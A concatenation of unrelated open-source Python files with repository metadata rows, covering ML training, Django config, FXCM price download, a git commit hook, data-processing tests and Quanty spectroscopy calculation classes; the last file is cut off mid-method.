val_stats.output(epoch=epoch, batch=batch_id, n_batches=num_samples, start=epoch_start_time, lr=lr)
gc.collect()
avg_acc = val_stats.avg_acc()
avg_loss = val_stats.avg_loss()
print_log_message('* Validation Stats')
print_log_message('* Loss: {:5.2f}, Mean Acc: {:3.2f}'.format(avg_loss, avg_acc))
return avg_acc, avg_loss
def run(self, *args, **kwargs):
kwargs['need_attn'] = False
if self.opts.warm_up:
self.warm_up(args=args, kwargs=kwargs)
if self.resume is not None:
# find the LR value
for epoch in range(self.start_epoch):
self.lr_scheduler.step(epoch)
eval_stats_dict = dict()
for epoch in range(self.start_epoch, self.opts.epochs):
epoch_lr = self.lr_scheduler.step(epoch)
self.optimizer = update_optimizer(optimizer=self.optimizer, lr_value=epoch_lr)
# Uncomment this line if you want to check the optimizer's LR is updated correctly
# assert read_lr_from_optimzier(self.optimizer) == epoch_lr
train_acc, train_loss = self.training(epoch=epoch, lr=epoch_lr, args=args, kwargs=kwargs)
val_acc, val_loss = self.validation(epoch=epoch, lr=epoch_lr, args=args, kwargs=kwargs)
eval_stats_dict[epoch] = val_acc
gc.collect()
# remember best accuracy and save checkpoint for best model
is_best = val_acc >= self.best_acc
self.best_acc = max(val_acc, self.best_acc)
model_state = self.mi_model.module.state_dict() if isinstance(self.mi_model, torch.nn.DataParallel) \
else self.mi_model.state_dict()
optimizer_state = self.optimizer.state_dict()
save_checkpoint(epoch=epoch,
model_state=model_state,
optimizer_state=optimizer_state,
best_perf=self.best_acc,
save_dir=self.opts.savedir,
is_best=is_best,
keep_best_k_models=self.opts.keep_best_k_models
)
self.logger.add_scalar('LR', round(epoch_lr, 6), epoch)
self.logger.add_scalar('TrainingLoss', train_loss, epoch)
self.logger.add_scalar('TrainingAcc', train_acc, epoch)
self.logger.add_scalar('ValidationLoss', val_loss, epoch)
self.logger.add_scalar('ValidationAcc', val_acc, epoch)
# dump the validation epoch id and accuracy data, so that it could be used for filtering later on
eval_stats_dict_sort = {k: v for k, v in sorted(eval_stats_dict.items(),
key=lambda item: item[1],
reverse=True
)}
eval_stats_fname = '{}/val_stats_bag_{}_word_{}_{}_{}'.format(
self.opts.savedir,
self.opts.bag_size,
self.opts.word_size,
self.opts.attn_fn,
self.opts.attn_type,
)
writer = DictWriter(file_name=eval_stats_fname, format='json')
# if json file does not exist
if not os.path.isfile(eval_stats_fname):
writer.write(data_dict=eval_stats_dict_sort)
else:
with open(eval_stats_fname, 'r') as json_file:
eval_stats_dict_old = json.load(json_file)
eval_stats_dict_old.update(eval_stats_dict_sort)
eval_stats_dict_updated = {k: v for k, v in sorted(eval_stats_dict_old.items(),
key=lambda item: item[1],
reverse=True
)}
writer.write(data_dict=eval_stats_dict_updated)
self.logger.close()
| 41.248677 | 140 | 0.602745 | ["MIT"] | alibalapour/HATNet | train_and_eval/trainer.py | 15,592 | Python |
class Error(Exception):
'''Base Error.'''
def __init__(self):
self.error = 'Fatal error occured.'
super().__init__(self.error)
class ArgError(Error):
'''Argument Error.'''
def __init__(self):
self.error = 'Incorrect argument passed.'
super().__init__(self.error)
class MissingArg(ArgError):
'''Argument is missing.'''
def __init__(self, arg):
self.error = f'{arg} is a required argument that is missing.'
super().__init__(self.error)
class InvalidArg(ArgError):
'''Argument is invalid.'''
def __init__(self, arg):
self.error = f'{arg} is invalid.'
super().__init__(self.error)
class HTTPError(Error):
'''Error occured in HTTP.'''
def __init__(self, code):
self.error = f'An error occured. Status: {code}'
super().__init__(self.error)
class Timeout(HTTPError):
'''Connection timed out.'''
def __init__(self):
self.error = 'The connection timed out.'
super().__init__(self.error)
class MissingData(Error):
'''Missing data.'''
def __init__(self, data):
        self.error = f'Value of {data} is missing.'
        super().__init__(self.error)
| 22.255319 | 63 | 0.685468 | ["MIT"] | cree-py/cocasync | cocasync/errors.py | 1,046 | Python |
from django.apps import AppConfig
class RuntimeMainConfig(AppConfig):
name = 'runtime_main'
| 16.333333 | 35 | 0.77551 | ["Apache-2.0"] | Bodya00/RunTime | runtime/runtime_main/apps.py | 98 | Python |
from sympy import symbols, integrate, Rational, lambdify
import matplotlib.pyplot as plt
import numpy as np
# Pollution from a factory is entering a lake. The rate of concentration of the pollutant at time t is given by
t = symbols( 't', positive = True )
dP = 91*t ** Rational( 5, 2 )
# where t is the number of years since the factory started introducing pollutants into the lake.
# Ecologists estimate that the lake can accept a total level of pollution of 7600 units before all the fish life in the lake ends.
# Can the factory operate for 5 years without killing all the fish in the lake?
# Yes, because:
P = integrate( dP, ( t, 0, 5 ) ).evalf()
round( P )
# is less than 7600.
# What is the polution doing?
g_xlim = [ 1, 10 ]
g_ylim = [ -5, 15 ]
lam_p = lambdify( t, integrate( dP, t ), np )
x_vals = np.linspace( g_xlim[0], g_xlim[1], 1000, endpoint=True )
y_vals = lam_p( x_vals )
plt.plot( x_vals, y_vals )
plt.show()
| 33.464286 | 132 | 0.708645 | ["MIT"] | bmoretz/Python-Playground | src/Classes/MSDS400/Module 7/polution.py | 939 | Python |
import numpy as np
import pandas as pd
from collections import OrderedDict
def one_to_one_matching(pred_infos, gt_infos,
keys=('scene_id', 'view_id'),
allow_pred_missing=False):
keys = list(keys)
pred_infos['pred_id'] = np.arange(len(pred_infos))
gt_infos['gt_id'] = np.arange(len(gt_infos))
matches = pred_infos.merge(gt_infos, on=keys)
matches_gb = matches.groupby(keys).groups
assert all([len(v) == 1 for v in matches_gb.values()])
if not allow_pred_missing:
assert len(matches) == len(gt_infos)
return matches
def get_candidate_matches(pred_infos, gt_infos,
group_keys=['scene_id', 'view_id', 'label'],
only_valids=True):
pred_infos['pred_id'] = np.arange(len(pred_infos))
gt_infos['gt_id'] = np.arange(len(gt_infos))
group_keys = list(group_keys)
cand_infos = pred_infos.merge(gt_infos, on=group_keys)
if only_valids:
cand_infos = cand_infos[cand_infos['valid']].reset_index(drop=True)
cand_infos['cand_id'] = np.arange(len(cand_infos))
return cand_infos
def match_poses(cand_infos, group_keys=['scene_id', 'view_id', 'label']):
assert 'error' in cand_infos
matches = []
def match_label_preds(group):
gt_ids_matched = set()
group = group.reset_index(drop=True)
gb_pred = group.groupby('pred_id', sort=False)
ids_sorted = gb_pred.first().sort_values('score', ascending=False)
gb_pred_groups = gb_pred.groups
for idx, _ in ids_sorted.iterrows():
pred_group = group.iloc[gb_pred_groups[idx]]
best_error = np.inf
best_match = None
for _, tentative_match in pred_group.iterrows():
if tentative_match['error'] < best_error and \
tentative_match['gt_id'] not in gt_ids_matched:
best_match = tentative_match
best_error = tentative_match['error']
if best_match is not None:
gt_ids_matched.add(best_match['gt_id'])
matches.append(best_match)
if len(cand_infos) > 0:
cand_infos.groupby(group_keys).apply(match_label_preds)
matches = pd.DataFrame(matches).reset_index(drop=True)
else:
matches = cand_infos
return matches
| 36.369231 | 75 | 0.630711 | ["MIT"] | lesteve/robopose | robopose/evaluation/meters/utils.py | 2,364 | Python |
# -- --------------------------------------------------------------------------------------------------- -- #
# -- project: A python project for algorithmic trading in FXCM -- #
# -- --------------------------------------------------------------------------------------------------- -- #
# -- script: data.py : functions to download and prepare price data from FXCM                               -- #
# -- author: YOUR GITHUB USER NAME -- #
# -- license: MIT License -- #
# -- --------------------------------------------------------------------------------------------------- -- #
# -- Template repository: https://github.com/IFFranciscoME/trading-project -- #
# -- --------------------------------------------------------------------------------------------------- -- #
# -- Packages for the script
import fxcmpy
import pandas as pd
# -- --------------------------------------------------------------------------------------------------- -- #
# -- --------------------------------------------------------------------------------------------------- -- #
api_token = "ba432..." # This token is obtained in the fxcm trading station platform
con = fxcmpy.fxcmpy(access_token=api_token, server='demo', log_level='error', log_file='fxcm_logs.txt')
# -- --------------------------------------------------------------------------------------------------- -- #
# -- --------------------------------------------------------------------------------------------------- -- #
def fxcm_ohlc(p_instrument, p_period, p_ini, p_end):
"""
to download OHLC prices from FXCM broker
Parameters
----------
p_instrument: str
The name of the instrument according to fxcmpy
    p_period: str
The frequency or granularity of prices, according to fxcmpy
p_ini: str
Initial timestamp, in format "yyyy-mm-dd hh:mm:ss"
p_end: str
final timestamp, in format "yyyy-mm-dd hh:mm:ss"
Returns
-------
data_ohlc: DataFrame
with columns Open, High, Low, Close and Timestamp as index
"""
data_ohlc = con.get_candles(instrument=p_instrument, period=p_period,
start=p_ini, end=p_end)
data_ohlc['open'] = (data_ohlc['bidopen'] + data_ohlc['askopen'])*0.5
data_ohlc['high'] = (data_ohlc['bidhigh'] + data_ohlc['askhigh'])*0.5
data_ohlc['low'] = (data_ohlc['bidlow'] + data_ohlc['asklow'])*0.5
data_ohlc['close'] = (data_ohlc['bidclose'] + data_ohlc['askclose'])*0.5
data_ohlc = data_ohlc[['open', 'high', 'low', 'close']]
data_ohlc.index.name = 'timestamp'
return data_ohlc
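# Usage sketch (the instrument, period and dates are illustrative assumptions, not from
# the original project; timestamps follow the "yyyy-mm-dd hh:mm:ss" format noted above):
# df_prices = fxcm_ohlc(p_instrument='EUR/USD', p_period='m1',
#                       p_ini='2020-01-01 00:00:00', p_end='2020-01-02 00:00:00')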
| 44.698413 | 109 | 0.393111 | ["MIT"] | IFFranciscoME/trading-project | data.py | 2,816 | Python |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2020/1/28 14:07
# @Author : ywl
# @Email : [email protected]
# @File : commit-msg.py.py
import os
import sys
import re
import json
crc_list = (
0x0000, 0x1021, 0x2042, 0x3063, 0x4084, 0x50a5, 0x60c6, 0x70e7,
0x8108, 0x9129, 0xa14a, 0xb16b, 0xc18c, 0xd1ad, 0xe1ce, 0xf1ef,
0x1231, 0x0210, 0x3273, 0x2252, 0x52b5, 0x4294, 0x72f7, 0x62d6,
0x9339, 0x8318, 0xb37b, 0xa35a, 0xd3bd, 0xc39c, 0xf3ff, 0xe3de,
0x2462, 0x3443, 0x0420, 0x1401, 0x64e6, 0x74c7, 0x44a4, 0x5485,
0xa56a, 0xb54b, 0x8528, 0x9509, 0xe5ee, 0xf5cf, 0xc5ac, 0xd58d,
0x3653, 0x2672, 0x1611, 0x0630, 0x76d7, 0x66f6, 0x5695, 0x46b4,
0xb75b, 0xa77a, 0x9719, 0x8738, 0xf7df, 0xe7fe, 0xd79d, 0xc7bc,
0x48c4, 0x58e5, 0x6886, 0x78a7, 0x0840, 0x1861, 0x2802, 0x3823,
0xc9cc, 0xd9ed, 0xe98e, 0xf9af, 0x8948, 0x9969, 0xa90a, 0xb92b,
0x5af5, 0x4ad4, 0x7ab7, 0x6a96, 0x1a71, 0x0a50, 0x3a33, 0x2a12,
0xdbfd, 0xcbdc, 0xfbbf, 0xeb9e, 0x9b79, 0x8b58, 0xbb3b, 0xab1a,
0x6ca6, 0x7c87, 0x4ce4, 0x5cc5, 0x2c22, 0x3c03, 0x0c60, 0x1c41,
0xedae, 0xfd8f, 0xcdec, 0xddcd, 0xad2a, 0xbd0b, 0x8d68, 0x9d49,
0x7e97, 0x6eb6, 0x5ed5, 0x4ef4, 0x3e13, 0x2e32, 0x1e51, 0x0e70,
0xff9f, 0xefbe, 0xdfdd, 0xcffc, 0xbf1b, 0xaf3a, 0x9f59, 0x8f78,
0x9188, 0x81a9, 0xb1ca, 0xa1eb, 0xd10c, 0xc12d, 0xf14e, 0xe16f,
0x1080, 0x00a1, 0x30c2, 0x20e3, 0x5004, 0x4025, 0x7046, 0x6067,
0x83b9, 0x9398, 0xa3fb, 0xb3da, 0xc33d, 0xd31c, 0xe37f, 0xf35e,
0x02b1, 0x1290, 0x22f3, 0x32d2, 0x4235, 0x5214, 0x6277, 0x7256,
0xb5ea, 0xa5cb, 0x95a8, 0x8589, 0xf56e, 0xe54f, 0xd52c, 0xc50d,
0x34e2, 0x24c3, 0x14a0, 0x0481, 0x7466, 0x6447, 0x5424, 0x4405,
0xa7db, 0xb7fa, 0x8799, 0x97b8, 0xe75f, 0xf77e, 0xc71d, 0xd73c,
0x26d3, 0x36f2, 0x0691, 0x16b0, 0x6657, 0x7676, 0x4615, 0x5634,
0xd94c, 0xc96d, 0xf90e, 0xe92f, 0x99c8, 0x89e9, 0xb98a, 0xa9ab,
0x5844, 0x4865, 0x7806, 0x6827, 0x18c0, 0x08e1, 0x3882, 0x28a3,
0xcb7d, 0xdb5c, 0xeb3f, 0xfb1e, 0x8bf9, 0x9bd8, 0xabbb, 0xbb9a,
0x4a75, 0x5a54, 0x6a37, 0x7a16, 0x0af1, 0x1ad0, 0x2ab3, 0x3a92,
0xfd2e, 0xed0f, 0xdd6c, 0xcd4d, 0xbdaa, 0xad8b, 0x9de8, 0x8dc9,
0x7c26, 0x6c07, 0x5c64, 0x4c45, 0x3ca2, 0x2c83, 0x1ce0, 0x0cc1,
0xef1f, 0xff3e, 0xcf5d, 0xdf7c, 0xaf9b, 0xbfba, 0x8fd9, 0x9ff8,
0x6e17, 0x7e36, 0x4e55, 0x5e74, 0x2e93, 0x3eb2, 0x0ed1, 0x1ef0
)
def sum_crc16(crc, file_bit):
"""
    Compute the CRC16 checksum.
    @param crc: initial checksum value
    @param file_bit: binary (byte) stream of the file
    @return: updated checksum
"""
for bit in file_bit:
crc = 0xffff & crc
# temp = crc // 256
temp = crc >> 8
crc = 0xffff & crc
crc <<= 8
crc = 0xffff & crc
crc ^= crc_list[0xff & (temp ^ bit)]
return crc
def sum_file_crc16(file_name):
"""
    Compute the checksum of a file, 4096 bytes at a time.
    @param file_name: file name
    @return: checksum
"""
crc = 0
with open(file_name, 'rb') as f:
crc = sum_crc16(crc, f.read())
return crc
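# Usage sketch (illustrative, not part of the original script):
#   crc = sum_crc16(0, b'hello world')      # checksum of an in-memory byte string
#   crc = sum_file_crc16('src/AIService')   # checksum of the service binary on disk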
def get_version():
with open("pack/release_version.json", "r+", encoding="utf8") as f:
try:
versions = json.load(f)
return 'v' + versions["release_versions"][-1][-1]
except Exception as e:
print("读取版本失败 : ", e)
exit(-1)
def get_srv_crc():
srv_name = "src/AIService"
if not os.path.exists(srv_name) or os.path.isdir(srv_name):
print("no srv build AIService")
exit(-1)
return sum_file_crc16(srv_name)
# crc = hex(sum_file_crc16(srv_name)).upper()[2:]
# crc = '0' * (4 - len(crc)) + crc
# return crc
def check_first_line(line):
return re.match(r'\[version : [vV](0|[1-9][0-9]*.?)\.(0|[1-9][0-9]*.?)\.(0|[1-9][0-9]*.?)\] '
r'\[srv-crc16 : [0-9A-F]{4}\]$', line)
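# A first line such as "[version : v1.2.3] [srv-crc16 : 00AF]" matches this pattern
# (illustrative example; it mirrors the "pre" string built in add_pre_msg below).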
def add_pre_msg():
commit_msg_file = sys.argv[1]
with open(commit_msg_file, "r+") as f:
text = list()
while True:
line = f.readline()
if not line:
break
text.append(line)
pre = "[version : %s] [srv-crc16 : %04X]\n" % (get_version(), get_srv_crc())
if check_first_line(text[0]):
text[0] = pre
else:
text.insert(0, pre)
f.seek(0)
f.truncate()
f.writelines(text)
if __name__ == "__main__":
add_pre_msg()
| 33.096296 | 98 | 0.597359 | ["MIT"] | wotsen/learning_platform_server | hooks/commit-msg.py | 4,550 | Python |
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import filecmp
import os
import json
import tempfile
import unittest
from india_rbi.below_poverty_line.preprocess import BelowPovertyLineDataLoader
# module_dir_ is the path to where this test is running from.
module_dir_ = os.path.dirname(__file__)
class TestPreprocess(unittest.TestCase):
def test_create_csv(self):
with tempfile.TemporaryDirectory() as tmp_dir:
xlsx_file = os.path.join(module_dir_, 'test_data/test.XLSX')
expected_file = os.path.join(module_dir_, 'test_data/expected.csv')
result_file = os.path.join(tmp_dir, 'test_cleaed.csv')
loader = BelowPovertyLineDataLoader(xlsx_file)
loader.download()
loader.process()
loader.save(csv_file_path=result_file)
same = filecmp.cmp(result_file, expected_file)
os.remove(result_file)
self.assertTrue(same)
if __name__ == '__main__':
unittest.main()
| 32.382979 | 79 | 0.720762 | ["Apache-2.0"] | clincoln8/data | scripts/india_rbi/below_poverty_line/preprocess_test.py | 1,522 | Python |
# coding: utf-8
###################################################################
# Copyright (c) 2016-2020 European Synchrotron Radiation Facility #
# #
# Author: Marius Retegan #
# #
# This work is licensed under the terms of the MIT license. #
# For further information, see https://github.com/mretegan/crispy #
###################################################################
"""Classes used to setup Quanty calculations."""
import datetime
import glob
import logging
import os
import re
import subprocess
from functools import lru_cache
from PyQt5.QtCore import QProcess, Qt, pyqtSignal
from crispy import resourceAbsolutePath
from crispy.config import Config
from crispy.gui.items import BaseItem, DoubleItem, IntItem, SelectableItem
from crispy.gui.quanty.axes import Axes
from crispy.gui.quanty.hamiltonian import Hamiltonian
from crispy.gui.quanty.spectra import Spectra
from crispy.quanty import CALCULATIONS, XDB
logger = logging.getLogger(__name__)
settings = Config().read()
SUBSHELLS = {
"3d": {"atomicNumbers": (21, 30 + 1), "coreElectrons": 18},
"4d": {"atomicNumbers": (39, 48 + 1), "coreElectrons": 36},
"4f": {"atomicNumbers": (57, 71 + 1), "coreElectrons": 54},
"5d": {"atomicNumbers": (72, 80 + 1), "coreElectrons": 68},
"5f": {"atomicNumbers": (89, 103 + 1), "coreElectrons": 86},
}
OCCUPANCIES = {"s": 2, "p": 6, "d": 10, "f": 14}
class Element(BaseItem):
def __init__(self, parent=None, name="Element", value=None):
super().__init__(parent=parent, name=name)
self.symbol = None
self.charge = None
self.value = value
@property
def atomicNumber(self):
return XDB.atomic_number(self.symbol)
@property
def valenceSubshell(self):
"""Name of the valence subshell."""
for subshell, properties in SUBSHELLS.items():
if self.atomicNumber in range(*properties["atomicNumbers"]):
return subshell
return None
@property
def valenceBlock(self):
# pylint: disable=unsubscriptable-object
"""Name of the valence block."""
return self.valenceSubshell[-1]
@property
def valenceOccupancy(self):
"""Occupancy of the valence subshell."""
assert self.charge is not None, "The charge must be set."
# Reverse the string holding the charge before changing it to
# an integer.
charge = int(self.charge[::-1])
# Calculate the number of electrons of the ion.
ion_electrons = self.atomicNumber - charge
        core_electrons = SUBSHELLS[self.valenceSubshell]["coreElectrons"]
        occupancy = ion_electrons - core_electrons
return occupancy
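    # Worked example (illustrative, not from the original code): for Ni2+ the atomic
    # number is 28, so the ion has 28 - 2 = 26 electrons; subtracting the 18 core
    # electrons of the 3d block gives a valence occupancy of 8, i.e. a 3d8 ion.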
@property
def value(self):
if self.charge is None:
return f"{self.symbol}"
return f"{self.symbol}{self.charge}"
@value.setter
def value(self, value):
if value is None:
return
tokens = re.findall(r"(\w{1,2})(\d[+,-])", value)
if not tokens:
raise ValueError(f"Invalid element {value}.")
[tokens] = tokens
self.symbol, self.charge = tokens
class Configuration:
# pylint: disable=too-many-instance-attributes
def __init__(self, value=None):
self.value = value
self.energy = None
self.atomic_parameters = None
@property
def value(self):
return self._value
@value.setter
def value(self, value):
PATTERNS = (r"^(\d)(\w)(\d+),(\d)(\w)(\d+)$", r"^(\d)(\w)(\d+)$")
# Test the configuration string.
tokens = (token for pattern in PATTERNS for token in re.findall(pattern, value))
if not tokens:
raise ValueError("Invalid configuration string.")
[tokens] = tokens
if len(tokens) == 3:
core = None
valence = tokens
elif len(tokens) == 6:
core = tokens[:3]
valence = tokens[-3:]
else:
raise ValueError("Unexpected length of the configuration string.")
valenceLevel, valenceShell, valenceOccupancy = valence
valenceLevel = int(valenceLevel)
valenceOccupancy = int(valenceOccupancy)
if valenceOccupancy > OCCUPANCIES[valenceShell]:
raise ValueError("Wrong number of electrons in the valence shell.")
if core:
coreLevel, coreShell, coreOccupancy = core
coreLevel = int(coreLevel)
coreOccupancy = int(coreOccupancy)
if coreOccupancy > OCCUPANCIES[coreShell]:
raise ValueError("Wrong number of electrons in the core shell.")
self.levels = (coreLevel, valenceLevel)
self.shells = (coreShell, valenceShell)
self.occupancies = [coreOccupancy, valenceOccupancy]
else:
self.levels = (valenceLevel,)
self.shells = (valenceShell,)
self.occupancies = [valenceOccupancy]
self.subshells = tuple(
[f"{level}{shell}" for level, shell in zip(self.levels, self.shells)]
)
self._value = value
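    # Parsing example (illustrative): Configuration("2p6,3d8") yields levels=(2, 3),
    # shells=("p", "d"), occupancies=[6, 8] and subshells=("2p", "3d"); the single-shell
    # form "3d8" yields levels=(3,), shells=("d",) and occupancies=[8].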
@property
def hasCore(self):
return len(self.subshells) == 2
@staticmethod
def countParticles(shell, occupancy):
"""Count the number of particles (electrons) or quasiparticles
(holes) in a shell."""
key = f"{shell}{occupancy}"
if key in ("s0", "s2", "p0", "p6", "d0", "d10", "f0", "f14"):
particles = "zero"
elif key in ("s1", "p1", "p5", "d1", "d9", "f1", "f13"):
particles = "one"
else:
particles = "multiple"
return particles
@property
def numberOfCoreParticles(self):
"""Count the number of core particles. Returns None if the electronic
configuration has no core."""
if not self.hasCore:
return None
core_shell, _ = self.shells
core_occupancy, _ = self.occupancies
return self.countParticles(core_shell, core_occupancy)
@classmethod
def fromSubshellsAndOccupancies(cls, subshells, occupancies):
value = ",".join(
f"{subshell:s}{occupancy:d}"
for subshell, occupancy in zip(subshells, occupancies)
)
return cls(value=value)
def __hash__(self):
return hash(self.value)
def __eq__(self, other):
return self.value == other.value
def __lt__(self, other):
return self.value < other.value
def __repr__(self):
return self.value
class Symmetry(BaseItem):
def __init__(self, parent=None, name="Symmetry", value=None):
super().__init__(parent=parent, name=name, value=value)
class Edge(BaseItem):
def __init__(self, parent=None, name="Edge", value=None):
super().__init__(parent=parent, name=name, value=value)
@property
def coreSubshells(self):
"""Use the name of the edge to determine the names of the core subshells.
e.g. for K (1s) the function returns ("1s",), while for K-L2,3 (1s2p) it
returns ("1s", "2p").
"""
PATTERNS = (r".*\((\d\w)(\d\w)\)", r".*\((\d\w)\)")
name = self.value
tokens = (token for pattern in PATTERNS for token in re.findall(pattern, name))
# Get the elements of the generator.
[tokens] = tokens
if not tokens:
raise ValueError("The name of the edge cannot be parsed.")
if isinstance(tokens, str):
tokens = (tokens,)
return tokens
@property
def coreBlocks(self):
return tuple(subshell[1] for subshell in self.coreSubshells)
@property
def coreOccupancies(self):
return tuple(OCCUPANCIES[coreBlock] for coreBlock in self.coreBlocks)
@property
def labels(self):
"""Edge or line labels needed to interrogate xraydb database."""
CONVERTERS = {
"Kɑ": "Ka1",
"Kβ": "Kb1",
"K": "K",
"L1": "L1",
"L2,3": "L3",
"M1": "M1",
"M2,3": "M3",
"M4,5": "M5",
"N1": "N1",
"N2,3": "N3",
"N4,5": "N5",
"O1": "O1",
"O2,3": "O3",
"O4,5": "O5",
}
raw, _ = self.value.split()
names = list()
separator = "-"
if separator in raw:
names.extend(raw.split(separator))
else:
names.append(raw)
# TODO: This needs to be put in a try/except block.
names = [CONVERTERS[name] for name in names]
return tuple(names)
class Experiment(BaseItem):
def __init__(self, parent=None, name="Experiment", value=None):
super().__init__(parent=parent, name=name, value=value)
@property
def isOneStep(self):
return self.value in ("XAS", "XPS")
@property
def isTwoSteps(self):
return not self.isOneStep
@property
def excitesToVacuum(self):
return self.value in ("XES", "XPS")
@property
def isOneDimensional(self):
return not self.isTwoDimensional
@property
def isTwoDimensional(self):
return self.value in ("RIXS",)
@property
def isEmission(self):
return self.value in ("XES",)
class Temperature(IntItem):
def __init__(self, parent=None, name="Temperature", value=None):
super().__init__(parent=parent, name=name, value=value)
@property
def value(self):
return self._value
@value.setter
def value(self, value):
if value < 0:
raise ValueError("The temperature cannot be negative.")
self._value = value
class MagneticField(DoubleItem):
def __init__(self, parent=None, name="Magnetic Field", value=None):
super().__init__(parent=parent, name=name, value=value)
@property
def value(self):
return self._value
@value.setter
def value(self, value):
self._value = value
# Set the values in the magnetic field Hamiltonian term.
calculation = self.ancestor
hamiltonian = calculation.hamiltonian
# Use the normalized vector.
k = calculation.axes.xaxis.photon.k.normalized
TESLA_TO_EV = 5.7883818011084e-05
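        # This factor appears to be the Bohr magneton expressed in eV/T, so
        # B (tesla) * TESLA_TO_EV gives the Zeeman energy scale in eV.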
for i, name in enumerate(("Bx", "By", "Bz")):
# Get the values of the wave vector.
for item in hamiltonian.findChild(name):
item.value = k[i] * value * TESLA_TO_EV
class Runner(QProcess):
outputUpdated = pyqtSignal(str)
successful = pyqtSignal(bool)
def __init__(self, parent=None):
super().__init__(parent=parent)
# Merge stdout and stderr channels.
self.setProcessChannelMode(QProcess.MergedChannels)
self.startingTime = None
self.endingTime = None
self.readyRead.connect(self.updateOutput)
self.finished.connect(self.checkExitCodes)
self.output = str()
def run(self, inputName):
self.startingTime = datetime.datetime.now()
# Run Quanty using QProcess.
try:
self.start(self.executablePath, (inputName,))
except FileNotFoundError as error:
raise RuntimeError from error
cwd = os.getcwd()
message = f"Running Quanty {inputName} in the folder {cwd}."
logger.info(message)
def checkExitCodes(self, exitCode, exitStatus):
self.endingTime = datetime.datetime.now()
successful = False
if exitStatus == 0 and exitCode == 0:
message = "Quanty has finished successfully in "
delta = self.runningTime
            hours, remainder = divmod(delta, 3600)
            minutes, seconds = divmod(remainder, 60)
seconds = round(seconds, 2)
if hours > 0:
message += "{} hours {} minutes and {} seconds.".format(
hours, minutes, seconds
)
elif minutes > 0:
message += "{} minutes and {} seconds.".format(minutes, seconds)
else:
message += "{} seconds.".format(seconds)
logger.info(message)
successful = True
elif exitStatus == 0 and exitCode == 1:
message = (
"Quanty has finished unsuccessfully. "
"Check the logging window for more details."
)
logger.info(message)
# exitCode is platform dependent; exitStatus is always 1.
elif exitStatus == 1:
message = "Quanty was stopped."
logger.info(message)
self.successful.emit(successful)
def updateOutput(self):
data = self.readAll().data()
data = data.decode("utf-8").rstrip()
self.output = self.output + data
self.outputUpdated.emit(data)
@property
def runningTime(self):
return (self.endingTime - self.startingTime).total_seconds()
@property
def executablePath(self):
path = Config().read().value("Quanty/Path")
if path is None:
message = (
"The path to the Quanty executable is not set. "
"Please use the preferences menu to set it."
)
raise FileNotFoundError(message)
# Test the executable.
with open(os.devnull, "w") as fp:
try:
subprocess.call(path, stdout=fp, stderr=fp)
except FileNotFoundError as e:
message = (
"The Quanty executable is not working properly. "
"Is the PATH set correctly?"
)
logger.error(message)
raise e
return path
class Calculation(SelectableItem):
# pylint: disable=too-many-instance-attributes, too-many-arguments, too-many-public-methods
titleChanged = pyqtSignal(str)
def __init__(
self,
symbol="Ni",
charge="2+",
symmetry="Oh",
experiment="XAS",
edge="L2,3 (2p)",
hamiltonian=True,
parent=None,
):
super().__init__(parent=parent, name="Calculation")
# Set the very special ancestor, in this case self.
self._ancestor = self
        # Validate the keyword arguments here; doing this through properties
        # gets rather convoluted.
self._symbols = list()
for subshell in CALCULATIONS.keys():
self._symbols.extend(CALCULATIONS[subshell]["symbols"])
self._symbols = tuple(sorted(self._symbols))
if symbol not in self.symbols:
symbol = self._symbols[0]
# Get the subshell.
subshell = None
for subshell in CALCULATIONS.keys():
if symbol in CALCULATIONS[subshell]["symbols"]:
break
symbols = CALCULATIONS[subshell]["symbols"]
experiments = CALCULATIONS[subshell]["experiments"]
self._charges = tuple(symbols[symbol]["charges"])
if charge not in self._charges:
charge = self._charges[0]
self._experiments = tuple(experiments)
if experiment not in self._experiments:
experiment = self._experiments[0]
self._symmetries = tuple(experiments[experiment]["symmetries"])
if symmetry not in self._symmetries:
symmetry = self._symmetries[0]
self._edges = tuple(experiments[experiment]["edges"])
if edge not in self._edges:
edge = self._edges[0]
self.element = Element(parent=self, value=f"{symbol}{charge}")
self.symmetry = Symmetry(parent=self, value=symmetry)
self.experiment = Experiment(parent=self, value=experiment)
self.edge = Edge(parent=self, value=edge)
self.temperature = Temperature(parent=self, value=10)
self.magneticField = MagneticField(parent=self, value=0)
self.axes = Axes(parent=self)
self.spectra = Spectra(parent=self)
# This flag is needed because the class is also used to generate Hamiltonian
# parameters, which are needed to create the Hamiltonian object in the
        # first place. A bit of a chicken-and-egg problem.
if hamiltonian:
self.hamiltonian = Hamiltonian(parent=self)
# Set the name of the calculation.
subshells = "".join(self.edge.coreSubshells)
element = self.element.value
symmetry = self.symmetry.value
experiment = self.experiment.value
self._value = f"{element}_{symmetry}_{experiment}_{subshells}"
# Instantiate the runner used to execute Quanty.
self.runner = Runner()
self.runner.successful.connect(self.process)
@property
def value(self):
return self._value
@value.setter
def value(self, value):
self._value = value
self.dataChanged.emit(0)
self.titleChanged.emit(value)
def data(self, column, role=Qt.DisplayRole):
if role in (Qt.EditRole, Qt.DisplayRole, Qt.UserRole):
column = 0 if column == 1 else 1
return super().data(column, role)
def setData(self, column, value, role=Qt.EditRole):
if role in (Qt.EditRole, Qt.UserRole):
column = 0 if column == 1 else 1
return super().setData(column, value, role)
def flags(self, column):
return (
Qt.ItemIsEnabled
| Qt.ItemIsSelectable
| Qt.ItemIsEditable
| Qt.ItemIsUserCheckable
)
@property
def symbols(self):
return self._symbols
@property
def charges(self):
return self._charges
@property
def symmetries(self):
return self._symmetries
@property
def experiments(self):
return self._experiments
@property
def edges(self):
return self._edges
@property
def templateName(self):
valenceSubshell = self.element.valenceSubshell
symmetry = self.symmetry.value
experiment = self.experiment.value
subshells = "".join(self.edge.coreSubshells)
return f"{valenceSubshell}_{symmetry}_{experiment}_{subshells}.lua"
@property
@lru_cache()
def configurations(self):
"""Determine the electronic configurations involved in a calculation."""
valenceSubshell = self.element.valenceSubshell
valenceOccupancy = self.element.valenceOccupancy
configurations = list()
# Initial configuration.
initialConfiguration = Configuration.fromSubshellsAndOccupancies(
subshells=(valenceSubshell,), occupancies=(valenceOccupancy,)
)
configurations.append(initialConfiguration)
# Final and in some cases intermediate configurations.
if self.experiment.isOneStep:
if not self.experiment.excitesToVacuum:
